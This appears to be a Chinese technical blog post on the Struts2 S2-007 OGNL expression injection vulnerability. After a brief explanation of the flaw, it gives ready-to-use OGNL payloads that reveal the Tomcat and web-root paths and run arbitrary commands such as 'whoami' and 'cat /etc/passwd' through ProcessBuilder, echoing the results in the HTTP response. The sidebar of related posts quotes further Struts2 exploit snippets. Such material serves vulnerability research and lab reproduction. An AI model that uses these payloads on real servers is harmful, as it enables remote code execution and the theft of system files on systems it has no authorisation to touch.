java 2mi远程执行漏洞_S2-007 远程代码执行漏洞检测与利用

最新推荐文章于 2024-04-06 15:36:17 发布
原创 最新推荐文章于 2024-04-06 15:36:17 发布 · 381 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java 2mi远程执行漏洞

本文介绍了一个Struts2框架的安全漏洞,详细解释了如何通过用户输入的数据来触发该漏洞,并展示了如何利用这个漏洞进行路径获取、文件读取以及执行任意命令等攻击手段。

漏洞原理

如下age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。

c82b8fae06a853b9e905f505834bead7.png

POC

a.获取tomcat执行路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

b、获取web路径

%{

#req=@org.apache.struts2.ServletActionContext@getRequest(),

#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),

#response.println(#req.getRealPath('/')),

#response.flush(),

#response.close()

}

c、执行任意命令:

%{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"whoami"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),#f.getWriter().close()

}

执行任意命令时,如果所执行的命令需要组合,则将上述 payload 改为:

%{

#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),

#b=#a.getInputStream(),

#c=new java.io.InputStreamReader(#b),

#d=new java.io.BufferedReader(#c),

#e=new char[50000],

#d.read(#e),

#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),

#f.getWriter().println(new java.lang.String(#e)),

#f.getWriter().flush(),#f.getWriter().close()

}

苏欣妍
关注
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞(S2-001)
qq_51577576的博客
08-21 1434
Struts2 远程命令执行漏洞(S2-001) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞(CVE-2020-17530)(S2-061)
qq_51577576的博客
08-22 879
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
Struts2 S2-046漏洞复现
2301_76467680的博客
07-09 931
在xb中间加个空格选中后改为00,再发包。修改filename参数。成功实现远程命令执行
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7885
从源码的角度分析Struts2(s2-045)远程命令执行漏洞利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
【vulhub】Structs2 S2-046 远程代码执行漏洞(CVE-2017-5638)
weixin_42884199的博客
12-07 1133
前提 Apache Struts2存在远程代码执行漏洞,攻击者可以将恶意代码放入http报文头部的Content-Disposition的filename字段,通 过不恰当的filename字段或者大小超过2G的Content-Length字段来触发异常,进而导致任意代码执行。 影响版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10 一、启动靶机 docker-compose build docker-compose up -d 二、
java 2mi远程执行漏洞_Struts2 5个远程代码执行漏洞利用POC
weixin_28822657的博客
02-27 1587
标 题: Struts2 5个远程代码执行漏洞利用POC作 者: 园长链 接: http://my.oschina.net/backtract/blog/133638利用代码: 检测是否存在:POC1:http://127.0.0.1/Struts2/test.action?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)((...
JAVA CGI 远程代码执行_【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞
weixin_42474164的博客
02-27 577
漏洞描述【漏洞预警】Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏https://www.secfree.com/article-395.html漏洞作者iswin from 360-sg-lab (360观星实验室)漏洞等级高漏洞复现在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏...
中兴面试总结,华为。技术,市场
peng10101010的专栏
10-11 6428
1,软件测试,如何把这个测试做的更好。 2
IMX307云服务整合全攻略:构建智能系统的10步法
IMX307云服务代表了先进云技术高性能芯片的结合,旨在提供高效、可扩展的云服务解决方案。本文首先概述了IMX307云服务的基础架构和核心功能,随后深入分析了其理论基础和系统架构设计要点。文章详细介绍了开发流程...
Java框架安全篇--log4j2远程代码执行漏洞
最新发布
m0_63138919的博客
04-06 1872
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主师傅大佬勿喷,还希望大家指出错误
远程漏洞远程代码执行漏洞的二三事
kali_Ma的博客
06-11 936
远程命令执行漏洞的概念 远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令 远程代码执行漏洞概念 代码执行漏洞也叫代码注入漏洞,指用户通过浏览器 提交执行恶意脚本代码,执行恶意构造的脚本代码 两者区别 命令执行: 一般指操作系统命令 远程代码执行: 一般指的是脚本代码 造成的原因 造成的原因是Web服务器对用户输入命令安全检测不足, 导致恶意(操作系统命令 或 脚本代码)被执行。 命令执行漏洞 命令执行漏洞的分类 代码层:一些商业应用
java-sec-code spel表达式注入以及其他远程代码执行漏洞
weixin_44687621的博客
08-17 736
今天突然发现,我使用的java sercurity code是老版本的,github上有全新的版本。 https://github.com/JoyChou93/java-sec-code 重新下载了一下,导入之后没问题,相关的漏洞确实多了一些。 继续学习一下远程代码执行漏洞。 spel表达式导致Rce @RestController public class SpEL { @GetMapping("/spel/vuln") public String rce(String expressio
漏洞分析】远程命令执行漏洞总结
程序员阿飘 的博客
01-06 1069
fastjson.jar包原始下载地址:github.com/alibaba/fas…fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象JavaBean对象的转换,实现JavaBean对象json字符串的转换,实现json对象json字符串的转换。除了这个fastjson以外,还有Google开发的Gson包,其他形式的如net.sf.json包,
Spring Framework 远程代码执行漏洞
BoomA_的博客
03-30 1637
Spring框架曝光安全漏洞
S2-001远程代码执行漏洞
yc11223344的博客
05-06 1240
漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 利用docker启动环境,在本地访问虚拟机ip:8080 出于好奇可以先进行测试一下OGNL表达式 进行提交,报错解析返回的是4,说明可以解析%{}里面的东西 也.
Struts2远程命令执行漏洞
热门推荐
mirror97black的博客
12-20 1万+
Struts2 远程命令执行漏洞
struts2
weixin_33976072的博客
07-12 180
本章讲述Struts2的工作原理。 读者如果曾经学习过Struts1.x或者有过Struts1.x的开发经验,那么千万不要想当然地以为这一章可以跳过。实际上Struts1.xStruts2并无我们想象的血缘关系。虽然Struts2的开发小组极力保留Struts1.x的习惯,但因为Struts2的核心设计完全改变,从思想到设计到工作流程,都有了很大的不同。 Struts2...
【渗透测试】Struts2系列漏洞
weixin_53972936的博客
10-29 1万+
Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://baike.baidu.com/item/Java EE) Web应用的Model-View-Controller(MVC)设计模式的应用框架,是MVC经典设计模式中的一个经典产品
【vulhub】Structs2 S2-045 远程代码执行漏洞(CVE-2017-5638)
weixin_42884199的博客
12-07 627
前言 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload payload1: Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vulhub',233*233)}.multipart/form-data 在请求头插入上述payload 三、漏洞利用 payload2: Content-Type:
PyPI发布新Python库:xiaomi_mi_scale-0.0.2
用户可以通过该库直接在Python代码中控制小米智能秤,无需直接API进行交互,从而简化开发过程。 该库的版本号为0.0.2,根据语义化版本控制规则,该版本是一个初期版本,属于开发早期阶段,可能只包含了最基本的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值